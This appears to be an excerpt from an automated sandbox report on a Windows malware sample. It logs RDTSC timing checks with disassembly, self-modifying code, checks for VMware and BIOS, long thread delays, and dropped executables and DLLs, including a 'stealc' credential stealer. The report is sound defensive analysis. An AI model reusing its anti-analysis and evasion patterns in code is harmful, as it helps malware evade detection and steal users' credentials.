Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90207 second address: 4D9021F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F927881D814h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9021F second address: 4D90223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90223 second address: 4D9023A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F927881D80Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9023A second address: 4D90240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90240 second address: 4D90244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90244 second address: 4D90248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90248 second address: 4D90275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F927881D80Eh 0x00000012 adc cx, 5808h 0x00000017 jmp 00007F927881D80Bh 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90275 second address: 4D902A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9278BE282Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D902A4 second address: 4D902B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F927881D80Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D902B4 second address: 4D902DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE282Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9278BE2835h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D902DE second address: 4D902E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D902E3 second address: 4D90307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F92EB5E0B4Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9278BE2832h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90307 second address: 4D9038B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushfd 0x00000007 jmp 00007F927881D80Dh 0x0000000c sub si, 4DF6h 0x00000011 jmp 00007F927881D811h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 jmp 00007F927881D80Eh 0x00000026 je 00007F92EB21BAE7h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F927881D80Dh 0x00000035 sub ecx, 7DDFEA06h 0x0000003b jmp 00007F927881D811h 0x00000040 popfd 0x00000041 call 00007F927881D810h 0x00000046 pop eax 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9038B second address: 4D903C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2830h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007F9278BE2830h 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F9278BE282Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D903C3 second address: 4D903C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D903C7 second address: 4D903CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D903CD second address: 4D903D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D903D3 second address: 4D903D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D903D7 second address: 4D903ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edx, 61000000h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ecx, 553A4267h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D903ED second address: 4D90487 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 9E03h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F9278BE2836h 0x0000000f and ch, FFFFFFC8h 0x00000012 jmp 00007F9278BE282Bh 0x00000017 popfd 0x00000018 pushfd 0x00000019 jmp 00007F9278BE2838h 0x0000001e sbb eax, 1238A228h 0x00000024 jmp 00007F9278BE282Bh 0x00000029 popfd 0x0000002a popad 0x0000002b popad 0x0000002c jne 00007F92EB5E0A65h 0x00000032 jmp 00007F9278BE2836h 0x00000037 test byte ptr [esi+48h], 00000001h 0x0000003b pushad 0x0000003c jmp 00007F9278BE282Eh 0x00000041 mov dl, cl 0x00000043 popad 0x00000044 jne 00007F92EB5E0A4Ch 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90487 second address: 4D9048B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9048B second address: 4D904A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2832h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80756 second address: 4D8075A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D8075A second address: 4D80760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D808A1 second address: 4D8090E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov eax, 0ECFF13Bh 0x00000010 pushfd 0x00000011 jmp 00007F927881D810h 0x00000016 jmp 00007F927881D815h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, esi 0x0000001e pushad 0x0000001f jmp 00007F927881D80Ch 0x00000024 pushad 0x00000025 mov ah, 90h 0x00000027 mov di, 1600h 0x0000002b popad 0x0000002c popad 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F927881D815h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D8090E second address: 4D809DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov si, D651h 0x0000000e call 00007F9278BE282Eh 0x00000013 jmp 00007F9278BE2832h 0x00000018 pop ecx 0x00000019 popad 0x0000001a mov esi, dword ptr [ebp+08h] 0x0000001d pushad 0x0000001e mov ch, bh 0x00000020 pushfd 0x00000021 jmp 00007F9278BE2838h 0x00000026 jmp 00007F9278BE2835h 0x0000002b popfd 0x0000002c popad 0x0000002d sub ebx, ebx 0x0000002f pushad 0x00000030 mov edi, 7A8D2F80h 0x00000035 pushfd 0x00000036 jmp 00007F9278BE2839h 0x0000003b or eax, 738EAD86h 0x00000041 jmp 00007F9278BE2831h 0x00000046 popfd 0x00000047 popad 0x00000048 test esi, esi 0x0000004a jmp 00007F9278BE282Eh 0x0000004f je 00007F92EB5E81F5h 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F9278BE2837h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D809DE second address: 4D80A6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F927881D80Fh 0x00000009 adc ecx, 1D73221Eh 0x0000000f jmp 00007F927881D819h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F927881D80Fh 0x00000026 add si, 4C2Eh 0x0000002b jmp 00007F927881D819h 0x00000030 popfd 0x00000031 popad 0x00000032 mov ecx, esi 0x00000034 jmp 00007F927881D80Eh 0x00000039 je 00007F92EB22314Dh 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 pushad 0x00000043 popad 0x00000044 mov si, dx 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80A6B second address: 4D80AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, si 0x00000006 mov cl, 56h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [77816968h], 00000002h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F9278BE2832h 0x0000001b and ch, 00000038h 0x0000001e jmp 00007F9278BE282Bh 0x00000023 popfd 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80AA5 second address: 4D80ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F927881D812h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80ABB second address: 4D80AD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE282Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F92EB5E8110h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80AD8 second address: 4D80ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80ADC second address: 4D80AF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2837h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80AF7 second address: 4D80AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80AFD second address: 4D80B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80B01 second address: 4D80B77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F927881D80Dh 0x00000012 adc si, A096h 0x00000017 jmp 00007F927881D811h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F927881D810h 0x00000023 jmp 00007F927881D815h 0x00000028 popfd 0x00000029 popad 0x0000002a xchg eax, ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F927881D818h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80B77 second address: 4D80B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80B7B second address: 4D80B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80C9E second address: 4D80CB1 instructions: 0x00000000 rdtsc 0x00000002 movsx edi, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov cx, B11Dh 0x0000000b popad 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80CB1 second address: 4D80CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80CB5 second address: 4D80CB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80CB9 second address: 4D80CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90A20 second address: 4D90A81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F9278BE2837h 0x00000012 xor al, 0000006Eh 0x00000015 jmp 00007F9278BE2839h 0x0000001a popfd 0x0000001b movzx esi, dx 0x0000001e popad 0x0000001f mov ebx, 2BC53CD0h 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 mov ax, di 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90A81 second address: 4D90B11 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F927881D817h 0x00000008 and ah, 0000002Eh 0x0000000b jmp 00007F927881D819h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F927881D818h 0x0000001d and esi, 504D0DD8h 0x00000023 jmp 00007F927881D80Bh 0x00000028 popfd 0x00000029 push esi 0x0000002a mov eax, ebx 0x0000002c pop edx 0x0000002d popad 0x0000002e pop ebp 0x0000002f pushad 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F927881D80Ah 0x00000037 xor al, 00000038h 0x0000003a jmp 00007F927881D80Bh 0x0000003f popfd 0x00000040 popad 0x00000041 push eax 0x00000042 push edx 0x00000043 mov si, bx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90B11 second address: 4D90B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90F72 second address: 4D90F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90F78 second address: 4D90F7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90F7C second address: 4D90F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F927881D816h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90F9D second address: 4D90FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90FA3 second address: 4D90FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E1032D second address: 4E10332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10332 second address: 4E10376 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007F927881D80Eh 0x00000011 push dword ptr [ebp+08h] 0x00000014 jmp 00007F927881D810h 0x00000019 call 00007F927881D809h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10376 second address: 4E10393 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10393 second address: 4E10399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10399 second address: 4E1039D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E1039D second address: 4E10421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D813h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop esi 0x00000012 popad 0x00000013 jmp 00007F927881D817h 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jmp 00007F927881D819h 0x00000022 mov eax, dword ptr [eax] 0x00000024 pushad 0x00000025 push edi 0x00000026 jmp 00007F927881D80Ah 0x0000002b pop ecx 0x0000002c mov edx, 1B5A16C6h 0x00000031 popad 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F927881D813h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A6EC40 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A6C482 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C35543 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C12E29 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C09CBB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C9DD2A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: CBEC40 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: CBC482 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: E85543 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: E62E29 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: E59CBB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: EEDD2A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Special instruction interceptor: First address: ACEA88 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Special instruction interceptor: First address: C7E71D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Memory allocated: B40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Memory allocated: 1A950000 memory reserve | memory write watch
Source: C:\Windows\System32\svchost.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_04E10370 rdtsc 6_2_04E10370
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1100 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1102 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1055 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 955 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1107 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1149 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1152 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 917 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Window / User API: threadDelayed 372
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Window / User API: threadDelayed 364
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Window / User API: threadDelayed 370
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Window / User API: threadDelayed 390
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Window / User API: threadDelayed 369
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Window / User API: threadDelayed 371
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1001471001\c8908bf20d.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1001472001\2dc588f7b5.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\shop[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\TPKOcaeSvfBbrcMznKuF.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5C4X2NVYNV2E9BIIRWD89LJFJIM.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AAKAL78BRQNYOCIR09Y.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcruntime140[1].dll Jump to dropped file
